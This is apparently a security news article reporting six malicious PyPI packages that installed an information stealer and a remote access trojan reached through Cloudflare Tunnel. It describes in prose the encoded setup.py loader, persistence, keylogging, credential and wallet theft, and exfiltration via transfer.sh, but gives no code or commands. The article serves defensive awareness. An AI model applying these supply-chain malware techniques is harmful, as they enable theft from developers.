PyPI

Six malicious packages on PyPI, the Python Package Index, were found installing information-stealing and RAT (remote access trojan) malware while using Cloudflare Tunnel to bypass firewall restrictions for remote access.

The malicious packages attempt to steal sensitive user information stored in browsers, run shell commands, and use keyloggers to steal typed secrets.

The six packages were discovered by the Phylum research team, who closely monitors PyPI for emerging campaigns.

The researchers report that these malicious extensions first appeared on the package repository on December 22. The threat actors continued to upload other packages until the last day of the year.

The six malicious packages that Phylum detected are the following:

  • pyrologin – 165 downloads
  • easytimestamp – 141 downloads
  • discorder – 83 downloads
  • discord-dev – 228 downloads
  • style.py – 193 downloads
  • pythonstyles – 130 downloads

All of the packages have now been removed from PyPI, but those who downloaded them will have to manually uninstall the remnants of the infection, most notably the persistence mechanisms.

Information-stealer functionality

The installer (setup.py) on these files contains a base64-encoded string that decodes to a PowerShell script.

This script sets the '-ErrorAction SilentlyContinue' flag so that the script will silently continue, even if it runs into errors, to avoid detection by developers.

The PowerShell script will download a ZIP file from a remote resource, unzip it on a local temp directory and then install a list of dependencies and additional Python packages that make remote control and screenshot capturing possible.

Two additional packages are silently installed during that stage called 'flask' and 'flask_cloudflared.'

One of the files in the ZIP, "server.pyw," launches four threads, one to establish persistence between system reboots, one to ping a proxied onion site, one to start a keystroke logger, and one to steal data from the compromised machine.

The stolen data includes cryptocurrency wallets, browser cookies and passwords, Telegram data, Discord tokens, and more. This data is zipped up and transmitted through transfer[.]sh to the attackers, while a ping to the onion site confirms the completion of the info-stealing step.

Fourth thread undertaking the information stealing action
Fourth thread performs the data-stealing (Phylum)

Also a remote access trojan

The script now runs "cftunnel.py," also included in the ZIP archive, that is used to install a Cloudflare Tunnel client on the victim's machine.

Cloudflare Tunnel is a service offering that allows customers, even free accounts, to create a bidirectional tunnel from a server directly to the Cloudflare infrastructure.

This connection allows web servers to quickly become publicly available through Cloudflare without configuring firewalls, opening ports, or dealing with other routing issues.

The threat actors use this tunnel to remotely access a remote access trojan running on the infected device as the 'Flask' script, even if a firewall protects that device.

The Flask app used by the attackers, also known as "xrat," can steal the victim's username and IP address, run shell commands on the breached machine, exfiltrate specific files and directories, execute Python code, or download and launch additional payloads.

This RAT also supports a "live" remote desktop feed at a one-frame-per-second rate, which activates as soon as the victim types something or moves their mouse.

Live remote access
Live remote feed (Phylum)

This new set of apps uploaded in the PyPI proves that the threats on the platform are evolving, becoming more innovative and potent.

Unfortunately, removing the packages and banning the accounts that uploaded them on PyPI does not stop the threat actors, as they can return to action using new names.

Furthermore, even if the apps are removed from PyPi, they are still on infected devices, requiring developers to remove them manually.

If these malicious packages infected you, it is strongly recommended that you perform an antivirus scan and then change all passwords at websites you frequently visit.

Related Articles:

New Unfurling Hemlock threat actor floods systems with malware

Fake Google Chrome errors trick you into running malicious PowerShell scripts

Hackers phish finance orgs using trojanized Minesweeper clone

New Latrodectus malware attacks use Microsoft, Cloudflare themes

Polyfill.io, BootCDN, Bootcss, Staticfile attack traced to 1 operator